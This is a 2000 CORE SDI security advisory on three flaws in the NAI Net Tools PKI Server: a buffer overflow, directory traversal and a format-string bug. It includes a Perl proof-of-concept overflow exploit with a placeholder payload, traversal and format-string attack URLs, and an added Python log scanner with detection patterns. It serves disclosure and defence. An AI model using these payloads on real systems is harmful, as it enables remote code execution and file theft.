core-sdi.net.tools
Posted Aug 6, 2000
Authored by Ivan Arce | Site core-sdi.com

CORE SDI Security Advisory - NAI Net Tools PKI Server vulnerabilities. While investigating the exploitability of a buffer overflow in the Net Tools PKI Server from Network Associates Inc. we discovered three new vulnerabilities not fixed by hotfix 1, including buffer overflows and format bugs which allow remote attackers to execute arbitrary code. Perl proof of concept exploit included.

tags | remote, overflow, arbitrary, perl, vulnerability, proof of concept
SHA-256 | 851d469fd06907ffafd8c19e1da95cdb05443f7df3e7b6b1b7fd894c41df184f

-----------------------------------------------------------------------

CORE SDI S.A.
Buenos Aires, Argentina
<http://www.core-sdi.com>


CORE SDI Security Advisory
August 2nd, 2000

NAI Net Tools PKI Server vulnerabilities

-----------------------------------------------------------------------

While investigating the exploitability of a buffer overflow in
the Net Tools PKI Server from Network Associates Inc. we discovered
three new vulnerabilities not fixed by hotfix 1, released to fix
problems reported by Jim Stickley from Garrison Technologies Inc.
(see http://www.securityfocus.com/bid/1363 and
http://www.securityfocus.com/bin/1364)

Problem description
~~~~~~~~~~~~~~~~~~~~

Problem #1: Buffer overflow in strong.exe

A buffer overflow in the web server component of the
Net Tools PKI server allows a remote attacker to execute
arbitrary code as SYSTEM on the machine running it.

To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
which are excessively long (greater than 500 characters). Each
log entry can then be examined to see the IP address of the
computer that submitted the request.

Problem #2: Directory traversal vulnerability

The default installation of Net Tools PKI server allows
a remote attacker to view and download any file residing
on the server.

To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
containing "..\" within them. Each log entry can then be examined
to see the IP address of the computer that submitted the request.

Problem #3: Format strings with user supplied data

The Net Tools PKI Server fails to properly validate the data
passed as arguments to the server's logging routines, which
allows a remote attacker to execute arbitrary code as
SYSTEM on the machine running it.

Impact
~~~~~~

Problem #1: Remote unauthenticated access to the PKI Server,
execution of arbitrary commands as the user running
the enrollment server (System)

Problem #2: Remote unauthenticated access to any file on the PKI
server

Problem #3: Remote unauthenticated access to the PKI Server,
execution of arbitrary commands as the user running
the enrollment server (System)

Technical details
~~~~~~~~~~~~~~~~~

Problem #1: Buffer overflow in strong.exe

Strong.exe is the web server component of the PKI Server; it services
requests over SSL on ports 443/tcp, 444/tcp and 445/tcp (default ports).
While connections to port 443/tcp require both client and
server authentication using certificates, connections to
port 444/tcp require no client authentication; therefore
any user with network connectivity to the PKI server can
connect via HTTPS to that port.

The service running on port 443/tcp is called the
Administrative Web Server, so the requirement for mutual
authentication is obvious.
The service running on port 444/tcp is the Enrollment Web Server
and does not require a client side certificate by default.
Both web servers are actually virtual servers serviced by
strong.exe.

A buffer overflow is present in the function that generates log data;
it allows the stack to be overwritten with user supplied data passed
to the server as a URL in the HTTPS request.

https://host:444/<2965 'A' chars>

EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP=0040977B

The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure.
Since it is not a valid address, a segmentation fault is raised
a few instructions after the overwrite:

mov ecx,[eax+000000E4]

The above does not overwrite EIP, and it kills the
server before EIP is overwritten, but a slight variation of it
will let an attacker overwrite EBP and EIP and, by carefully
overwriting local variables, control the execution of arbitrary
code on the target machine.

A sample proof-of-concept Perl script exemplifies this:

-- cut here
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port and create the html file:
#   ./pkiluso.pl > test.html
# Open the html in an SSL compatible browser and click on the link. puf!
# Juliano Rizzo (c) 2000 juliano@core-sdi.com

$host = "localhost";
$port = "444";
$shell_code = "\x90\x90\x90\x90";   # placeholder payload (NOPs only)

# We can set the values of EIP and EBP; our code is on the stack
# and at 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";  # 0x01613A2E (URL read from the socket)
#$eip = "\x64\x83\x40\x00"; # 0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\x01\x02";  # 0x0200F2CB (the 00 truncates the string)
$noplen = 2965 - length($shell_code);
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90" x $noplen;
print $shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
      "\">Click here to exploit.!</a></body></html>";

note: wrapped for readability
----

Problem #2: Directory traversal vulnerability

By specifying '..\' in HTTPS requests to the enrollment server,
an attacker can navigate the server's file system and view/download
any file if its name is known.
By default the enrollment server uses
\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server
as the Web Root directory. If a file name is known (e.g. autoexec.bat),
the attacker just needs to supply the remaining path components to
access it:

https://host:444/..\..\..\..\..\autoexec.bat

will display the contents of the file in the browser.

If a filename is not known, the web server will reveal its
web root directory in an error message shown to the client:

https://host:444..\..\pirulo.pdf will result in:

File Not Found

The requested URL /..\..\pirulo.pdf was not found on this server.

There was also some additional information available about the error:
[Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\
Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed
for a.b.c.d, reason: File does not exist

Problem #3: Format strings with user supplied data

The user supplied URL is processed by Strong.exe and if the .XUDA
extension is found, the request is forwarded to XUDAD.EXE for further
processing. Prior to this "hand-off" the URL string is parsed, filtered
for metacharacters and passed to a function that logs the request.
Somewhere along the processing path, the user supplied data becomes
the format string for a formatted output function similar to the
ANSI C sprintf(). This allows a remote attacker to provide data that
will force that function into overwriting arbitrary portions of
the process memory and cause either a denial of service or
the execution of arbitrary code.

To exemplify this, the following URL will cause a DoS:

https://host:444/%25%25s.xuda

Notice that the hex value 0x25 represents the ASCII character '%',
thus the URL string will get converted to "%%s.xuda" and subsequently
to "%s.xuda".

A more elaborate attack might try to overwrite the return address on
the stack to force the server into executing arbitrary code.

Proof of concept, sample URL:

https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25x%25n.xuda

note: the string has been wrapped for readability.
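As an added example (not part of the advisory or of CORE SDI's code), the following Python script applies the three log checks this advisory describes to constructed access-log lines: entries longer than 500 characters (Problem #1), "..\" sequences (Problem #2), and, for Problem #3, the request URL decoded once and with "%%" collapsed to "%", so that a "%25%25s" request surfaces as the "%s" specifier the logging routine would see. The Common Log Format layout of the sample lines is an assumption; the advisory names enroll-access.log and admin-access.log but does not show their format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in a Common Log Format style; the
# advisory names enroll-access.log / admin-access.log but shows no format.
SAMPLE_LOG = (
    '10.0.0.5 - - [27/Jun/2000:19:47:33 -0300] "GET /enroll/index.html HTTP/1.0" 200 1024\n'
    '10.0.0.9 - - [27/Jun/2000:19:48:10 -0300] "GET /..\\..\\..\\..\\..\\autoexec.bat HTTP/1.0" 200 312\n'
    '10.0.0.7 - - [27/Jun/2000:19:49:02 -0300] "GET /%25%25s.xuda HTTP/1.0" 500 0\n'
    '10.0.0.3 - - [27/Jun/2000:19:50:00 -0300] "GET /' + 'A' * 2965 + ' HTTP/1.0" 500 0\n'
)

LONG_ENTRY = 500                              # threshold stated in the advisory
TRAVERSAL = re.compile(r'\.\.[\\/]')          # "..\" as in the advisory (also "../")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
# printf-style conversion: '%' flags width [.precision] conversion character
FMT_SPEC = re.compile(r'%[-+ #0]*\d*(?:\.\d+)?[diouxXnsp]')

def as_format_string(url):
    """What the logging routine would see: URL-decode once (%25%25s -> %%s),
    then collapse '%%' to '%' as one printf-style pass does (%%s -> %s)."""
    return unquote(url, errors='replace').replace('%%', '%')

def classify(line):
    """Return the set of advisory problem numbers (1, 2, 3) a log line matches."""
    hits = set()
    if len(line) > LONG_ENTRY:                # Problem #1: excessively long entry
        hits.add(1)
    if TRAVERSAL.search(line):                # Problem #2: directory traversal
        hits.add(2)
    m = REQUEST.search(line)
    if m and FMT_SPEC.search(as_format_string(m.group(1))):
        hits.add(3)                           # Problem #3: format specifier reaches the logger
    return hits

def scan(log_text):
    """Return (source_ip, sorted problem numbers) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            findings.append((line.split(' ', 1)[0], sorted(hits)))
    return findings

if __name__ == '__main__':
    for ip, problems in scan(SAMPLE_LOG):
        print(f'{ip} matches problem(s) {problems}')
```

Run it against the real log files by reading them into scan(); each finding carries the source IP, which is the detail the advisory tells administrators to examine.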


Fix information
~~~~~~~~~~~~~~~
Network Associates Inc. has released Hotfix 3 for the Net Tools PKI
Server.
It corrects the three problems. It can be obtained from:

http://www.nai.com/asp_set/download/upgrade/find.asp

Or contact Network Associates Technical support at 1-800-722-3709.

Vulnerable systems
~~~~~~~~~~~~~~~~~~
Net Tools PKI server 1.0 for NT
Net Tools PKI server 1.0 for NT (hotfix 1)
Net Tools PKI server 1.0 for NT (hotfix 2)

Additional information
~~~~~~~~~~~~~~~~~~~~~~
These vulnerabilities were discovered by Juliano Rizzo at CORE SDI S.A.

Previous problems were found and reported to Network Associates Inc.
by Jim Stickley from Garrison Technologies Inc.

We wish to thank Network Associates Inc. for their prompt response
to the issues raised by this advisory.


Copyright Notice:
~~~~~~~~~~~~~~~~~
The contents of this advisory are copyright (c) 2000 CORE SDI S.A. and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.

$Id: PKI_Server-advisory.txt,v 1.4 2000/08/02 18:15:40 iarce Exp $

--
"Understanding. A cerebral secretion that enables one having it to know
a house from a horse by the roof on the house.
Its nature and laws have been exhaustively expounded by Locke,
who rode a house, and Kant, who lived in a horse." - Ambrose Bierce


==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
email : iarce@core-sdi.com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=====================================================================

--- For a personal reply use iarce@core-sdi.com
